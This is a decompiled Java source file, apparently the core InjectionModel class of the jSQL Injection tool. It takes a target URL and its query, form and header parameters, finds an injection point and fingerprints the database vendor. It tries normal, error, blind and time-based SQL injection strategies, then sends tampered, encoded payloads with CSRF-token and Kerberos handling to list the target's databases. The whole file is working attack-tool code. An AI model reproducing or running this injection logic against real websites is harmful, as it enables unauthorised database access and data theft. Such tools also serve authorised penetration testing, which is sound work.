package com.jsql.model;

import com.jsql.i18n.I18n;
import com.jsql.model.accessible.DataAccess;
import com.jsql.model.accessible.RessourceAccess;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.InjectionFailureException;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.injection.method.MediatorMethodInjection;
import com.jsql.model.injection.method.MethodInjection;
import com.jsql.model.injection.strategy.MediatorStrategy;
import com.jsql.model.injection.vendor.MediatorVendor;
import com.jsql.model.suspendable.SuspendableGetCharInsertion;
import com.jsql.model.suspendable.SuspendableGetVendor;
import com.jsql.util.AuthenticationUtil;
import com.jsql.util.ConnectionUtil;
import com.jsql.util.ExceptionUtil;
import com.jsql.util.GitUtil;
import com.jsql.util.HeaderUtil;
import com.jsql.util.JsonUtil;
import com.jsql.util.ParameterUtil;
import com.jsql.util.PreferencesUtil;
import com.jsql.util.PropertiesUtil;
import com.jsql.util.ProxyUtil;
import com.jsql.util.SoapUtil;
import com.jsql.util.ThreadUtil;
import com.jsql.util.tampering.TamperingUtil;
import java.io.DataOutputStream;
import java.io.IOException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.nio.charset.Charset;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.PrivilegedActionException;
import java.util.AbstractMap;
import java.util.EnumMap;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.stream.Stream;
import javax.security.auth.login.LoginException;
import net.sourceforge.spnego.SpnegoHttpURLConnection;
import org.apache.commons.lang3.StringUtils;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LocationInfo;
import org.ietf.jgss.GSSException;
import org.json.JSONException;

/* loaded from: input_file:com/jsql/model/InjectionModel.class */
public class InjectionModel extends AbstractModelObservable {
    private static final Logger LOGGER = Logger.getRootLogger();
    public static final String STAR = "*";
    private String versionDatabase;
    private String nameDatabase;
    private String username;
    public static final boolean IS_PARAM_BY_USER = true;
    public static final boolean IS_JSON = true;
    private MediatorVendor mediatorVendor = new MediatorVendor(this);
    private MediatorMethodInjection mediatorMethodInjection = new MediatorMethodInjection(this);
    private DataAccess dataAccess = new DataAccess(this);
    private RessourceAccess resourceAccess = new RessourceAccess(this);
    private String srcSuccess = StringUtils.EMPTY;
    private String indexesInUrl = StringUtils.EMPTY;
    private boolean injectionAlreadyBuilt = false;
    private boolean isScanning = false;
    private MediatorUtils mediatorUtils = new MediatorUtils();
    private MediatorStrategy mediatorStrategy = new MediatorStrategy(this);

    public InjectionModel() {
        this.mediatorUtils.setPropertiesUtil(new PropertiesUtil(this));
        this.mediatorUtils.setConnectionUtil(new ConnectionUtil(this));
        this.mediatorUtils.setAuthenticationUtil(new AuthenticationUtil(this));
        this.mediatorUtils.setGitUtil(new GitUtil(this));
        this.mediatorUtils.setHeaderUtil(new HeaderUtil(this));
        this.mediatorUtils.setParameterUtil(new ParameterUtil(this));
        this.mediatorUtils.setExceptionUtil(new ExceptionUtil(this));
        this.mediatorUtils.setSoapUtil(new SoapUtil(this));
        this.mediatorUtils.setJsonUtil(new JsonUtil(this));
        this.mediatorUtils.setPreferencesUtil(new PreferencesUtil());
        this.mediatorUtils.setProxyUtil(new ProxyUtil(this));
        this.mediatorUtils.setThreadUtil(new ThreadUtil(this));
        this.mediatorUtils.setTamperingUtil(new TamperingUtil());
    }

    public void resetModel() {
        getMediatorStrategy().getNormal().setVisibleIndex(null);
        this.indexesInUrl = StringUtils.EMPTY;
        getMediatorUtils().getConnectionUtil().setTokenCsrf(null);
        this.versionDatabase = null;
        this.nameDatabase = null;
        this.username = null;
        setIsStoppedByUser(false);
        this.injectionAlreadyBuilt = false;
        getMediatorStrategy().setStrategy(null);
        this.resourceAccess.setReadingIsAllowed(false);
        getMediatorUtils().getThreadUtil().reset();
    }

    public void beginInjection() {
        resetModel();
        try {
            if (getMediatorUtils().getProxyUtil().isLive(GitUtil.ShowOnConsole.YES)) {
                LOGGER.info(I18n.valueByKey("LOG_START_INJECTION") + ": " + getMediatorUtils().getConnectionUtil().getUrlByUser());
                getMediatorUtils().getParameterUtil().checkParametersFormat();
                LOGGER.trace(I18n.valueByKey("LOG_CONNECTION_TEST"));
                getMediatorUtils().getConnectionUtil().testConnection();
                boolean testParameters = testParameters(getMediatorMethodInjection().getQuery());
                if (!testParameters) {
                    testParameters = getMediatorUtils().getSoapUtil().testParameters();
                }
                if (!testParameters) {
                    LOGGER.trace("Checking standard Request parameters");
                    testParameters = testParameters(getMediatorMethodInjection().getRequest());
                }
                if (!testParameters) {
                    testParameters(getMediatorMethodInjection().getHeader());
                }
                if (!this.isScanning) {
                    if (!getMediatorUtils().getPreferencesUtil().isNotInjectingMetadata()) {
                        getDataAccess().getDatabaseInfos();
                    }
                    getDataAccess().listDatabases();
                }
                LOGGER.trace(I18n.valueByKey("LOG_DONE"));
                this.injectionAlreadyBuilt = true;
            }
        } catch (JSqlException e) {
            LOGGER.warn(e.getMessage(), e);
        } finally {
            Request request = new Request();
            request.setMessage(Interaction.END_PREPARATION);
            sendToViews(request);
        }
    }

    public boolean testParameters(MethodInjection methodInjection) throws JSqlException {
        boolean z = false;
        if (!getMediatorUtils().getPreferencesUtil().isCheckingAllParam() && getMediatorUtils().getConnectionUtil().getMethodInjection() != methodInjection) {
            return false;
        }
        getMediatorUtils().getConnectionUtil().setMethodInjection(methodInjection);
        if (methodInjection.getParamsAsString().contains(STAR)) {
            LOGGER.info("Checking single " + methodInjection.name() + " parameter with injection point at *");
            z = testStrategies(false, false, null);
        } else if (methodInjection.isCheckingAllParam()) {
            loop0: for (AbstractMap.SimpleEntry<String, String> simpleEntry : methodInjection.getParams()) {
                for (AbstractMap.SimpleEntry<String, String> simpleEntry2 : methodInjection.getParams()) {
                    if (simpleEntry2 == simpleEntry) {
                        try {
                            z = (!getMediatorUtils().getPreferencesUtil().isCheckingAllJSONParam() || JsonUtil.createEntries(JsonUtil.getJson(simpleEntry2.getValue()), "root", null).isEmpty()) ? getMediatorUtils().getJsonUtil().testStandardParameter(methodInjection, simpleEntry2) : getMediatorUtils().getJsonUtil().testJsonParameter(methodInjection, simpleEntry2);
                            if (z) {
                                break loop0;
                            }
                        } catch (JSONException e) {
                            LOGGER.error("Error parsing JSON parameters", e);
                        }
                    }
                }
            }
        } else {
            methodInjection.getParams().stream().reduce((simpleEntry3, simpleEntry4) -> {
                return simpleEntry4;
            }).ifPresent(simpleEntry5 -> {
                simpleEntry5.setValue(((String) simpleEntry5.getValue()) + STAR);
            });
            z = testStrategies(true, false, methodInjection.getParams().stream().reduce((simpleEntry6, simpleEntry7) -> {
                return simpleEntry7;
            }).orElseThrow(NullPointerException::new));
        }
        return z;
    }

    public boolean testStrategies(boolean z, boolean z2, AbstractMap.SimpleEntry<String, String> simpleEntry) throws JSqlException {
        LOGGER.trace(I18n.valueByKey("LOG_GET_INSERTION_CHARACTER"));
        String characterInsertion = getMediatorUtils().getParameterUtil().getCharacterInsertion(z, simpleEntry);
        if (simpleEntry != null) {
            LOGGER.info(I18n.valueByKey("LOG_USING_INSERTION_CHARACTER") + " [" + new SuspendableGetCharInsertion(this).run(characterInsertion, simpleEntry, Boolean.valueOf(z2)).replace(STAR, StringUtils.EMPTY) + "]");
        }
        getMediatorVendor().setVendor(new SuspendableGetVendor(this).run(new Object[0]));
        getMediatorStrategy().getTime().checkApplicability();
        getMediatorStrategy().getBlind().checkApplicability();
        getMediatorStrategy().getError().checkApplicability();
        getMediatorStrategy().getNormal().checkApplicability();
        if (getMediatorStrategy().getNormal().isApplicable()) {
            getMediatorStrategy().getNormal().activateStrategy();
            return true;
        }
        if (getMediatorStrategy().getError().isApplicable()) {
            getMediatorStrategy().getError().activateStrategy();
            return true;
        }
        if (getMediatorStrategy().getBlind().isApplicable()) {
            getMediatorStrategy().getBlind().activateStrategy();
            return true;
        }
        if (!getMediatorStrategy().getTime().isApplicable()) {
            throw new InjectionFailureException("No injection found");
        }
        getMediatorStrategy().getTime().activateStrategy();
        return true;
    }

    @Override // com.jsql.model.AbstractModelObservable
    public String inject(String str, boolean z) {
        String urlBase = getMediatorUtils().getConnectionUtil().getUrlBase();
        String str2 = StringUtils.SPACE + str;
        String replaceAll = buildURL(urlBase, z, str2).trim().replaceAll("(?s)/\\*.*?\\*/", StringUtils.EMPTY).replaceAll("([^\\s\\w])(\\s+)", "$1").replaceAll("(\\s+)([^\\s\\w])", "$2").replaceAll("\\s+", "+");
        try {
            URL url = new URL(replaceAll);
            if (!getMediatorUtils().getParameterUtil().getQueryString().isEmpty()) {
                if (!replaceAll.contains(LocationInfo.NA)) {
                    replaceAll = replaceAll + LocationInfo.NA;
                }
                replaceAll = replaceAll + buildQuery(getMediatorMethodInjection().getQuery(), getMediatorUtils().getParameterUtil().getQueryStringFromEntries(), z, str2);
                if (getMediatorUtils().getConnectionUtil().getTokenCsrf() != null) {
                    replaceAll = replaceAll + "&" + getMediatorUtils().getConnectionUtil().getTokenCsrf().getKey() + "=" + getMediatorUtils().getConnectionUtil().getTokenCsrf().getValue();
                }
                try {
                    url = new URL(replaceAll);
                } catch (MalformedURLException e) {
                    LOGGER.warn("Incorrect Url: " + e.getMessage(), e);
                }
            } else if (getMediatorUtils().getConnectionUtil().getTokenCsrf() != null) {
                replaceAll = replaceAll + LocationInfo.NA + getMediatorUtils().getConnectionUtil().getTokenCsrf().getKey() + "=" + getMediatorUtils().getConnectionUtil().getTokenCsrf().getValue();
            }
            String str3 = StringUtils.EMPTY;
            try {
                HttpURLConnection connect = getMediatorUtils().getAuthenticationUtil().isKerberos() ? new SpnegoHttpURLConnection(Pattern.compile("(?s)\\{.*").matcher(StringUtils.join(Files.readAllLines(Paths.get(getMediatorUtils().getAuthenticationUtil().getPathKerberosLogin(), new String[0]), Charset.defaultCharset()), StringUtils.EMPTY)).replaceAll(StringUtils.EMPTY).trim()).connect(url) : (HttpURLConnection) url.openConnection();
                connect.setReadTimeout(getMediatorUtils().getConnectionUtil().getTimeout().intValue());
                connect.setConnectTimeout(getMediatorUtils().getConnectionUtil().getTimeout().intValue());
                connect.setDefaultUseCaches(false);
                connect.setRequestProperty("Pragma", "no-cache");
                connect.setRequestProperty("Cache-Control", "no-cache");
                connect.setRequestProperty("Expires", "-1");
                connect.setRequestProperty("Content-Type", "text/plain");
                if (getMediatorUtils().getConnectionUtil().getTokenCsrf() != null) {
                    connect.setRequestProperty(getMediatorUtils().getConnectionUtil().getTokenCsrf().getKey(), getMediatorUtils().getConnectionUtil().getTokenCsrf().getValue());
                }
                getMediatorUtils().getConnectionUtil().fixJcifsTimeout(connect);
                EnumMap enumMap = new EnumMap(Header.class);
                enumMap.put((EnumMap) Header.URL, (Header) replaceAll);
                if (!getMediatorUtils().getParameterUtil().getHeader().isEmpty()) {
                    HttpURLConnection httpURLConnection = connect;
                    Stream.of((Object[]) buildQuery(getMediatorMethodInjection().getHeader(), getMediatorUtils().getParameterUtil().getHeaderFromEntries(), z, str2).split("\\\\r\\\\n")).forEach(str4 -> {
                        if (str4.split(":").length == 2) {
                            HeaderUtil.sanitizeHeaders(httpURLConnection, new AbstractMap.SimpleEntry(str4.split(":")[0], str4.split(":")[1]));
                        }
                    });
                    enumMap.put((EnumMap) Header.HEADER, (Header) buildQuery(getMediatorMethodInjection().getHeader(), getMediatorUtils().getParameterUtil().getHeaderFromEntries(), z, str2));
                }
                if (!getMediatorUtils().getParameterUtil().getRequest().isEmpty() || getMediatorUtils().getConnectionUtil().getTokenCsrf() != null) {
                    try {
                        ConnectionUtil.fixCustomRequestMethod(connect, getMediatorUtils().getConnectionUtil().getTypeRequest());
                        connect.setDoOutput(true);
                        connect.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
                        DataOutputStream dataOutputStream = new DataOutputStream(connect.getOutputStream());
                        if (getMediatorUtils().getConnectionUtil().getTokenCsrf() != null) {
                            dataOutputStream.writeBytes(getMediatorUtils().getConnectionUtil().getTokenCsrf().getKey() + "=" + getMediatorUtils().getConnectionUtil().getTokenCsrf().getValue() + "&");
                        }
                        if (getMediatorUtils().getConnectionUtil().getTypeRequest().matches("PUT|POST")) {
                            if (getMediatorUtils().getParameterUtil().isRequestSoap()) {
                                dataOutputStream.writeBytes(buildQuery(getMediatorMethodInjection().getRequest(), getMediatorUtils().getParameterUtil().getRawRequest(), z, str2));
                            } else {
                                dataOutputStream.writeBytes(buildQuery(getMediatorMethodInjection().getRequest(), getMediatorUtils().getParameterUtil().getRequestFromEntries(), z, str2));
                            }
                        }
                        dataOutputStream.flush();
                        dataOutputStream.close();
                        if (getMediatorUtils().getParameterUtil().isRequestSoap()) {
                            enumMap.put((EnumMap) Header.POST, (Header) buildQuery(getMediatorMethodInjection().getRequest(), getMediatorUtils().getParameterUtil().getRawRequest(), z, str2));
                        } else {
                            enumMap.put((EnumMap) Header.POST, (Header) buildQuery(getMediatorMethodInjection().getRequest(), getMediatorUtils().getParameterUtil().getRequestFromEntries(), z, str2));
                        }
                    } catch (IOException e2) {
                        LOGGER.warn("Error during Request connection: " + e2.getMessage(), e2);
                    }
                }
                enumMap.put((EnumMap) Header.RESPONSE, (Header) HeaderUtil.getHttpHeaders(connect));
                try {
                    str3 = ConnectionUtil.getSource(connect);
                } catch (Exception e3) {
                    LOGGER.error(e3, e3);
                }
                enumMap.put((EnumMap) Header.SOURCE, (Header) str3);
                Request request = new Request();
                request.setMessage(Interaction.MESSAGE_HEADER);
                request.setParameters(enumMap);
                sendToViews(request);
            } catch (IOException | LoginException | GSSException | PrivilegedActionException e4) {
                LOGGER.warn("Error during connection: " + e4.getMessage(), e4);
            }
            return str3;
        } catch (MalformedURLException e5) {
            LOGGER.warn("Incorrect Query Url: " + e5.getMessage(), e5);
            return StringUtils.EMPTY;
        }
    }

    private String buildURL(String str, boolean z, String str2) {
        return str.contains(STAR) ? !z ? str.replace(STAR, str2) : str.replace(STAR, this.indexesInUrl.replaceAll("1337" + getMediatorStrategy().getNormal().getVisibleIndex() + "7331", Matcher.quoteReplacement(str2))) : str;
    }

    private String buildQuery(MethodInjection methodInjection, String str, boolean z, String str2) {
        String replace = str.replace(STAR, "SlQqLs*lSqQsL");
        String replaceAll = ((getMediatorUtils().getConnectionUtil().getMethodInjection() != methodInjection || getMediatorUtils().getConnectionUtil().getUrlBase().contains(STAR)) ? replace : replace.contains(STAR) ? !z ? replace.replace(STAR, str2 + getMediatorVendor().getVendor().instance().endingComment()) : replace.replace(STAR, this.indexesInUrl.replaceAll("1337" + getMediatorStrategy().getNormal().getVisibleIndex() + "7331", Matcher.quoteReplacement(str2)) + getMediatorVendor().getVendor().instance().endingComment()) : !z ? (replace + str2) + getMediatorVendor().getVendor().instance().endingComment() : (replace + this.indexesInUrl.replaceAll("1337" + getMediatorStrategy().getNormal().getVisibleIndex() + "7331", Matcher.quoteReplacement(str2))) + getMediatorVendor().getVendor().instance().endingComment()).replaceAll("(?s)/\\*.*?\\*/", StringUtils.EMPTY);
        String replace2 = (methodInjection == getMediatorMethodInjection().getRequest() && getMediatorUtils().getParameterUtil().isRequestSoap()) ? replaceAll.replace("%2b", "+") : replaceAll.replaceAll("([^\\s\\w])(\\s+)", "$1").replaceAll("(\\s+)([^\\s\\w])", "$2").replaceAll("\\s+", "+");
        if (getMediatorUtils().getConnectionUtil().getMethodInjection() == methodInjection) {
            replace2 = getMediatorUtils().getTamperingUtil().tamper(replace2);
        }
        return (methodInjection != getMediatorMethodInjection().getHeader() ? replace2.replace("\"", "%22").replace("'", "%27").replace("(", "%28").replace(")", "%29").replace("{", "%7B").replace("[", "%5B").replace("|", "%7C").replace("`", "%60").replace("]", "%5D").replace("}", "%7D").replace(">", "%3E").replace("<", "%3C").replace(LocationInfo.NA, "%3F").replace(StringUtils.SPACE, "+") : replace2.replace("+", "%20").replace(",", "%2C")).trim();
    }

    public void sendResponseFromSite(String str, String str2) {
        LOGGER.warn(str + ", response from site:");
        LOGGER.warn(">>>" + str2);
    }

    public void controlInput(String str, String str2, String str3, MethodInjection methodInjection, String str4, boolean z) {
        try {
            if (!str.isEmpty() && !str.matches("(?i)^https?://.*")) {
                if (str.matches("(?i)^\\w+://.*")) {
                    throw new MalformedURLException("unknown URL protocol");
                }
                LOGGER.info("Undefined URL protocol, forcing to [http://]");
                str = "http://" + str;
            }
            getMediatorUtils().getParameterUtil().initQueryString(str);
            getMediatorUtils().getParameterUtil().initRequest(str2);
            getMediatorUtils().getParameterUtil().initHeader(str3);
            getMediatorUtils().getConnectionUtil().setMethodInjection(methodInjection);
            getMediatorUtils().getConnectionUtil().setTypeRequest(str4);
            if (z) {
                beginInjection();
            } else {
                new Thread(this::beginInjection, "ThreadBeginInjection").start();
            }
        } catch (MalformedURLException e) {
            LOGGER.warn("Incorrect Url: " + e.getMessage(), e);
            Request request = new Request();
            request.setMessage(Interaction.END_PREPARATION);
            sendToViews(request);
        }
    }

    public void displayVersion() {
        LOGGER.trace("jSQL Injection v" + getMediatorUtils().getPropertiesUtil().getProperties().getProperty("jsql.version") + " on Java " + System.getProperty("java.version") + "-" + System.getProperty("os.arch") + "-" + System.getProperty("user.language"));
    }

    public String getDatabaseInfos() {
        return "Database [" + this.nameDatabase + "] on " + getMediatorVendor().getVendor() + " [" + this.versionDatabase + "] for user [" + this.username + "]";
    }

    public void setDatabaseInfos(String str, String str2, String str3) {
        this.versionDatabase = str;
        this.nameDatabase = str2;
        this.username = str3;
    }

    public String getSrcSuccess() {
        return this.srcSuccess;
    }

    public void setSrcSuccess(String str) {
        this.srcSuccess = str;
    }

    public String getIndexesInUrl() {
        return this.indexesInUrl;
    }

    public void setIndexesInUrl(String str) {
        this.indexesInUrl = str;
    }

    public boolean isInjectionAlreadyBuilt() {
        return this.injectionAlreadyBuilt;
    }

    public void setIsScanning(boolean z) {
        this.isScanning = z;
    }

    public String getVersionJsql() {
        return getMediatorUtils().getPropertiesUtil().getProperties().getProperty("jsql.version");
    }

    public MediatorUtils getMediatorUtils() {
        return this.mediatorUtils;
    }

    public MediatorVendor getMediatorVendor() {
        return this.mediatorVendor;
    }

    public MediatorMethodInjection getMediatorMethodInjection() {
        return this.mediatorMethodInjection;
    }

    public DataAccess getDataAccess() {
        return this.dataAccess;
    }

    public RessourceAccess getResourceAccess() {
        return this.resourceAccess;
    }

    public MediatorStrategy getMediatorStrategy() {
        return this.mediatorStrategy;
    }
}
